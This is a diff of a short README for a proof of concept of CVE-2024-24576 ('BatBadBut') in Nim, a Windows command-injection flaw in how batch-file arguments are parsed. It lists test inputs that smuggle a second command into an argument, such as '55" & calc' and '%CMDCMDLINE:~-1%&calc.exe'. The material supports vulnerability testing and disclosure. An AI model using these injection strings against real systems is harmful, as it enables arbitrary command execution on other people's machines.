1 | | - | # CVE-2024-24576-PoC---Nim |
2 | | - | CVE-2024-24576 PoC for Nim Lang |
| 1 | + | # CVE-2024-24576-PoC for Nim Lang |
| 2 | + | This is a POC for nim lang to apply the `BatBadBut` command injection vulnerability in Windows where attackers can inject commands via batch files due to the way the CreateProcess function and cmd.exe parsing rules interact. |
| 3 | + | |
| 4 | + | ## Which nim versionis affected: |
| 5 | + | All |
| 6 | + | |
| 7 | + | ## How to test it: |
| 8 | + | |
| 9 | + | Use the main.nim to test it like this: |
| 10 | + | |
| 11 | + | ## First test `Double Qoute Escape` |
| 12 | + | 55" & calc |
| 13 | + | 87" & whoami |
| 14 | + | |
| 15 | + | ## 2nd test |
| 16 | + | %CMDCMDLINE:~-1%&calc.exe |
3 | 17 | | |